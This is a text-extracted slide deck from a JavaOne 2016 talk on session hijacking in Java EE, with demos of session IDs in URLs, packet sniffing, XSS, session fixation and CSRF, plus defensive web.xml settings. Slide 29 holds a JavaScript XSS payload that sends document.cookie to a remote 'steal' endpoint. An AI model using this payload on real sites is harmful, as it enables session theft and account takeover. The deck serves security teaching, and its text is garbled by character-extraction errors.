The Hacker's Guide To Session Hijacking
3 likes753 views
The document discusses session hijacking in Java EE applications. It begins with an introduction of the speaker and their background. It then provides an overview of HTTP sessions and how session IDs can be exposed, including through URLs, sniffing network traffic, cross-site scripting attacks, and insecure transport. The presentation demonstrates four ways to hijack sessions: by exposing the session ID in the URL, sniffing network traffic to obtain the session ID cookie, using a cross-site scripting attack to steal the session cookie with JavaScript, and session fixation. It recommends best practices like using only cookie-based sessions, encrypting traffic with HTTPS, setting the HttpOnly and secure flags on cookies, and generating new session IDs on login to prevent
The Hacker's Guide To Session Hijacking
- 1. The Hacker’s Guide to Session Hijacking in Java EE Patrycja Wegrzynowicz CTO, Yonita, Inc. JavaOne 2016
- 2. About Me • 15+ professional experience • SoRware engineer, architect, head of soRware R&D • Author and speaker • JavaOne, Devoxx, JavaZone, TheServerSide Java Symposium, Jazoon, OOPSLA, ASE, others • Top 10 Women in Tech 2016 in Poland • Founder and CTO of Yonita • Automated detecZon and refactoring of soRware defects • Trainings and code reviews • Security, performance, concurrency, databases • Twi[er @yonlabs
- 3. About Me • 15+ professional experience • SoRware engineer, architect, head of soRware R&D • Author and speaker • JavaOne, Devoxx, JavaZone, TheServerSide Java Symposium, Jazoon, OOPSLA, ASE, others • Top 10 Women in Tech 2016 in Poland • Founder and CTO of Yonita • Bridge the gap between the industry and the academia • Automated detecZon and refactoring of soRware defects • Trainings and code reviews • Security, performance, concurrency, databases • Twi[er @yonlabs
- 4. Agenda • HTTP, session, OWASP • 4 demos to hijack a session • Best pracZces in Java EE
- 7. HTTP
- 8. HTTP
- 9. What is Web Session? • Session idenZfies interacZons with one user • Unique idenZfier associated with every request • Cookie • Header • Parameter • Hidden field
- 10. OWASP Top 10 Risks
- 12. Session Hijacking • Session theR • URL, sniffing, logs, XSS
- 13. Session Hijacking • Session theR • URL, sniffing, logs, XSS • Session fixaZon
- 14. Session Hijacking • Session theR • URL, sniffing, logs, XSS • Session fixaZon • Session predicZon
- 15. Demo: Session Exposed in URL • I will log into the sample applicaZon • I will post a link with my session id on Twi[er • @yonlabs • Hijack my session :)
- 16. How to Avoid Session Id in URL? • Default: allows cookies and URL rewriZng • Default cookie, fall back on URL rewriZng • To embrace all users • Disabled cookies in a browser • Disable URL rewriZng in an app server • App server specific • Tracking mode • Java EE 6, web.xml
- 17. web.xml <!-‐-‐ Java EE 6, Servlet 3.0 -‐-‐> <session-‐config> <tracking-‐mode>COOKIE</tracking-‐mode> </session-‐config>
- 18. Session Sniffing • How to find out a cookie? • e.g., network monitoring and packet sniffing • How to use a cookie? • Browsers’ plugins and add-‐ons (e.g., Cookie Manager for Firefox) • IntercepZng proxy (e.g., OWASP ZAP) • DIY: write your own code
- 19. Demo: Session Sniffing • You will log into the sample applicaZon • Any non empty user name • Please, use meaningful names! • I will monitor network traffic • tcpdump • I will hijack one of your sessions • Cookie Manager
- 20. How to Avoid Session Exposure During Transport?
- 21. How to Avoid Session Exposure During Transport? Encrypt! Use HTTPS.
- 22. web.xml <security-‐constraint> <user-‐data-‐constraint> <transport-‐guarantee> CONFIDENTIAL </transport-‐guarantee> </user-‐data-‐constraint> </security-‐constraint>
- 23. web.xml <!-‐-‐ Java EE 6, Servlet 3.0 -‐-‐> <session-‐config> <cookie-‐config> <secure>true</secure> </cookie-‐config> <tracking-‐mode>COOKIE</tracking-‐mode> </session-‐config>
- 24. Session Exposure • Transport • Unencrypted transport • Client-‐side • XSS • A[acks on browsers/OS • Server-‐side • Logs • Session replicaZon • Memory dump
- 25. How to Steal a Session if Secure Transport Is Used?
- 26. How to Steal a Session if Secure Transport Is Used? A3ack a client!
- 27. Demo: Session Grabbed by XSS • JavaScript code to steal a cookie • Servlet to log down stolen cookies • Vulnerable applicaZon to be exploited via injected JavaScript code (XSS)
- 28. Demo: Session Grabbed by XSS • I will store malicious JavaScript code in the app • Through wriZng an “opinion” • Log into the vulnerable applicaZon • h[ps://demo.yonita.com:8181/session-‐xss/ • Any non empty user name • Please, use meaningful names! • Click ‚View others opinions’ page • Wait unZl I will hijack your session :)
- 29. JavaScript to Steal a Cookie <script> <!-‐-‐ hacker’s service -‐-‐> theR = ’h[p://demo.yonita.com/steal/steal?cookie=’ <!-‐-‐ to bypass Same Origin Policy -‐-‐> image = new Image(); image.src = theR + document.cookie; </script>
- 30. web.xml <!-‐-‐ Java EE 6, Servlet 3.0 -‐-‐> <session-‐config> <cookie-‐config> <h[p-‐only>true</h[p-‐only> <secure>true</secure> </cookie-‐config> <tracking-‐mode>COOKIE</tracking-‐mode> </session-‐config>
- 31. Session FixaZon • Session fixaZon a[ack uZlizes a session creaZon
- 32. When Session is Created? A. On storing an a[ribute in a session for the first Zme B. On calling request.getSession(true) /() for the first Zme C. On a successful login D. None of the above
- 33. When Session is Created? A. On storing an a[ribute in a session for the first Zme B. On calling request.getSession(true)/() for the first Zme C. On a successful login D. None of the above
- 34. When Session is Created? A. On storing an a[ribute in a session for the first Zme B. On calling request.getSession(true)/() for the first Zme • H[pServletRequest::getSession(true) • H[pServletRequest::getSession() • an implicit session object on JSP pages • unless <%@ page session="false" %> C. On a successful login D. None of the above
- 35. Session FixaZon: Scenario 1 • Hacker opens a web page of a system in a browser • JSP page: a new session iniZalized! • Hacker writes down the session id • Hacker leaves the browser open • User comes and logs into the app • Uses the session iniZalized by the hacker • Hacker uses the wri[en down session id to hijack the user’s session
- 36. Session FixaZon: Scenario 2 • Hacker opens a web page of a system in a browser • JSP page: a new session iniZalized! • Hacker prepares a link with the session id in URL • Hacker tricks a user to click the link • e.g. sends an email with the link • User clicks the link • Uses the session iniZalized by the hacker • Hacker uses the wri[en down session id to hijack the user’s session
- 37. Session FixaZon: SoluZon • Change the session ID aRer a successful login • more generally: escalaZon of privileges
- 38. Servlet 3.0/3.1 Spec • Containers may create HTTP Session objects to track login state. If a developer creates a session while a user is not authenZcated, and the container then authenZcates the user, the session visible to developer code a=er login must be the same session object that was created prior to login occurring so that there is no loss of session informaZon.
- 39. Session FixaZon: SoluZon in Java EE • Change the session ID aRer a successful login • more generally: escalaZon of privileges • Java EE 7 (Servlet 3.1) • H[pServletRequest.changeSessionId() • Java EE 6 • H[pSession.invalidate() • H[pServletRequest.getSession(true)
- 40. Secure Session Management Best PracZces • Random, unpredictable session id • At least 16 characters • Secure transport and storage of session id • Cookie preferred over URL rewriZng • Cookie flags: secure, h[pOnly • Don’t use too broad cookie paths • Consistent use of HTTPS • Don’t mix HTTP and HTTPS under the same domain/cookie path
- 41. Consistent Use of HTTPS Typical Errors • StaZc content served as HTTP from the same domain name • Pre-‐authenZcated pages as HTTP, post-‐authenZcated pages as HTTPS from the same domain name • Login form as HTTPS, the rest as HTTP • GMail for a few years aRer its launch!
- 42. Secure AuthenZcaZon Best PracZces • Session creaZon and destrucZon • New session id aRer login • Logout bu[on • Session Zmeouts: 2”-‐5” for criZcal apps, 15”-‐30” for typical apps • DetecZng session anomalies • Basic heurisZc: a session associated with the headers of the first request • The fingerprint of a first reques: IP, User-‐Agent,… • If they don’t match, something’s going on (invalidate!) • OWASP ModSecurity Web ApplicaZon Firewall • Rules for detecZng common security a[acks
- 43. Secure AuthenZcaZon Best PracZces cont. • Java EE • DeclaraZve authenZcaZon implemented using descriptors • ProgrammaZc authenZcaZon • AnnotaZons, H[pServletRequest: authenZcate, login, logout • Advanced flows and requirements • Custom implementaZon • Servlet 3.0 vs 3.1 • the session visible to developer code a=er login must be the same session object that was created prior to login • Session fixaZon problem • 3.0: no way to change a session id! • 3.1: changeSessionId • Check out the container implementaZons • Java EE 6 vs. Java EE 7
- 44. Secure AuthenZcaZon Best PracZces cont. • My choice • DeclaraZve authenZcaZon with Java EE 7 • Check out your applicaZon server behavior! • ProgrammaZc authenZcaZon with Java EE 6 or when advanced flow need in Java EE 7 • H[pServletRequest: authenZcate, login, logout • Custom implementaZon
- 45. What If We Can’t Steal a Cookie?
- 46. What If We Can’t Steal a Cookie? We can sDll use it!
- 47. Demo: CSRF to Use a Cookie • I will log into the applicaZon • Log into the applicaZon • h[ps://demo.yonita.com:8181/session-‐csrf/ • Any non empty user name • Please, use meaningful names! • Click the link and the bu[on ‘Click me’ • h[ps://demo.yonita.com:8181/a[ack-‐csrf/ • I will check my account balance :)
- 48. CSRF: SoluZon • Use a unique token for each request • anZ-‐CSRF token • Remember about your web forms and REST services • POST requests • Other HTTP acZons as needed • Web framework dependent
- 49. Conclusion You are never safe!
- 50. A fool with a tool is only a fool!
- 52. Please, vote! :)
- 53. Q&A • patrycja@yonita.com • @yonlabs